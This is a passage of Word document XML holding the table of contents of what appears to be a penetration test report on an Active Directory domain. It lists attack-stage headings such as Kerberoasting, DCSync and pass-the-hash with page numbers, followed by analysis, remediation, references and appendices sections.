        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="11B510C9" w14:textId="4E49632F" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="3460C21C"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58F07284" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.5 Stage 5: WinRM Host Discovery &amp; Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1B66087F" w14:textId="661D2704" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="509D9831"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7F037B11" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.6 Stage 6: Leftover Deployment Artifact Credential Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="439545A5" w14:textId="3DD78596" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="18C11172"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48E4740E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.7 Stage 7: Local Privilege Escalation on MS01 (Sysax Service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7F451845" w14:textId="19EC9548" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="576485D4"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41C6F7FD" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.8 Stage 8: LSA Secrets Dump on MS01 (Autologon Secrets)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="092479E2" w14:textId="439A158C" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00782646">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="4F485A76"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466EEEBB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.9 Stage 9: Targeted Kerberoasting via GenericWrite Delegation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28C9582C" w14:textId="38F39E7E" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00782646">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="6E10EB27"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25C34FD7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.10 Stage 10: Privileged Group Self-Addition (Server Admins)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="50DA9EF5" w14:textId="2103EE14" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="4EE7ADEE"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1A1A2251" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   5.11 Stage 11: DCSync Attack - Full Domain Credential Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="77A34DAC" w14:textId="2CD4E780" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="7B6C0DC3"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29085369" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">   5.12 Stage 12: Proof of Domain Compromise (Pass-the-Hash)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3F74B5B7" w14:textId="72421B08" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="213A61B7"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7B58DB56" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>6. Analysis and Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1AE368DB" w14:textId="337F3F79" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="01313CBE"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57C3803F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   6.1 Root Cause &amp; Cumulative Risk Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="021BD7C4" w14:textId="6D00AD79" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="309A4795"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58F403E4" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   6.2 Misconfiguration Impact Summary Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="24461B83" w14:textId="3A987DB2" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="56ACB80B"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29B8F48D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">   6.3 Prioritized Remediation Roadmap Aligned with CIS Benchmarks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="378A7B66" w14:textId="30404F94" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="556F271E"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3B1D5C7B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>7. Conclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7071B665" w14:textId="7617D0BB" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00782646">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="24860C37"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243C8F6E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8. References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="42572728" w14:textId="3FBAD91D" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00782646">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="00421A4E" w14:paraId="7FE77C61"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458F55EC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00421A4E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9. Appendices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="26E02490" w14:textId="4FAC92B9" w:rsidR="00E142F8" w:rsidRPr="00421A4E" w:rsidRDefault="00782646">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
